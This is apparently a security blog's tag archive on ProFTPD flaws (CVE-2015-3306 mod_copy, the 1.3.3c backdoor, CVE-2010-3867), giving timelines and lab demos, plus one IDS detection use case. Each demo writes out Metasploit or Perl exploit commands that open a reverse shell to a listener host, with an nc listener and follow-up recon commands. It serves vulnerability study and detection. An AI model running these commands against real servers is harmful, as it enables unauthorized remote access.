Tag Archives: ProFTPD

CVE-2015-3306 ProFTPD 1.3.5 Mod_Copy Command Execution

Exploits, Metasploit,

Timeline :

Vulnerability discovered and reported to the vendor by Vadim Melihow the 2015-04-07
Workaround provided by the vendor the 2015-04-07
Vulnerability details released the 2015-04-13
Metasploit PoC provided the 2015-04-22
Patch provided by the vendor the 2015-05-28

PoC provided by :

Vadim Melihow
xistence

Reference(s) :

CVE-2015-3306

Affected version(s) :

All versions of ProFTPD 1.3.5 before 1.3.5a
All versions of ProFTPD 1.3.6 before 1.3.6rc1

Tested on :

Centos 6.7 with ProFTPD 1.3.5

Description :

This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination. The copy commands are executed with the rights of the ProFTPD service, which by default runs under the privileges of the ‘nobody’ user. By using /proc/self/cmdline to copy a PHP payload to the website directory, PHP remote code execution is made possible.

This vulnerability is only triggered in particular conditions:
– ProFTPD need to have the rights to write into a web accessible folder having the privileges of ProFTPD.
– SELinux must be disabled

Commands :

ProFTPD is running with user and group “nobody”
ProFTPD is configured with “LoadModule mod_copy.c” in proftpd.conf file
A “test” folder has been created in “/var/www/html/“ with nodody:nobody privileges

use exploit/unix/ftp/proftpd_modcopy_exec
set RHOST 192.168.6.154
set SITEPATH /var/www/html/test
set TARGETURI /test/
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.6.138
run

id

Done !

SUC028 : ProFTPD Backdoor Inbound Backdoor Open Request (ACIDBITCHEZ)

Opportunists, Use Cases,
  • Use Case Reference : SUC028
  • Use Case Title : ProFTPD Backdoor Inbound Backdoor Open Request (ACIDBITCHEZ)
  • Use Case Detection : IDS / FTP logs
  • Attacker Class : Opportunists
  • Attack Sophistication : Unsophisticated
  • Identified tool(s) : Metasploit, Nessus, scripts, etc.
  • Source IP(s) : Random
  • Source Countries : Random
  • Source Port(s) : Random
  • Destination Port(s) : 21/TCP

Possible(s) correlation(s) :

  • Pen-testing tools or home made scripts

Source(s) :

  • ProFTPD Backdoor demo

Emerging Threats SIG 2011994 triggers are :

  • The FTP content should contain “HELP ACIDBITCHEZ“, how is the backdoor command.
  • The source port could be any FROM EXTERNAL_NET in destination of an HOME_NET port 21/TCP.
SIG 2011994 1 year events activity
SIG 2011994 1 year events activity

OSVDB-69562 : ProFTPD 1.3.3c Backdoor Command Execution

Exploits, Metasploit,

Timeline :

Public release of the backdoor presence the 2010-12-01
Metasploit PoC provided the 2010-12-02

PoC provided by :

MC
darkharper2

Reference(s) :

OSVDB-69562

Affected version(s) :

proftpd-1.3.3c from the dates of 2010-11-28 to 2010-12-02

Tested on Ubuntu 10.0.4 LTS with :

proftpd-1.3.3c patched with diff

Description :

This module exploits a malicious backdoor that was added to the ProFTPD download archive. This backdoor was present in the proftpd-1.3.3c.tar.[bz2|gz] archive between November 28th 2010 and 2nd December 2010.

Commands :

use exploit/unix/ftp/proftpd_133c_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.21
exploit

id
uname -a
ifconfig

CVE-2010-3867 : ProFTPD IAC Remote Root Exploit

Exploits, Metasploit,

Timeline :

Vulnerability reported to vendor by ZDI the 2010-09-24
Coordinated public release of advisory the 2010-11-02
Metasploit exploit released the 2010-11-05
Exploit-DB exploit released the 2010-11-07

PoC provided by :

jduck for Metasploit exploit
Kingcope for Exploit-DB exploit

Reference(s) :

CVE-2010-3867
EDB-15449

Affected version(s) :

ProFTPD versions between 1.3.2rc3 and 1.3.3b

Tested on Debian Squeeze with :

ProFTPD proftpd-basic_1.3.3a-4_i386.deb

Description :

This module exploits a stack-based buffer overflow in versions of ProFTPD server between versions 1.3.2rc3 and 1.3.3b. By sending data containing a large number of Telnet IAC commands, an attacker can corrupt memory and execute arbitrary code.

Metasploit Demo :

use exploit/linux/ftp/proftp_telnet_iac
set RHOST 192.168.178.40
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid
ipconfig

Exploit-DB demo :

nc -lvn 45295
perl proftpd_iac.pl 192.168.178.40 192.168.178.21 5
id
uname -a
ifconfig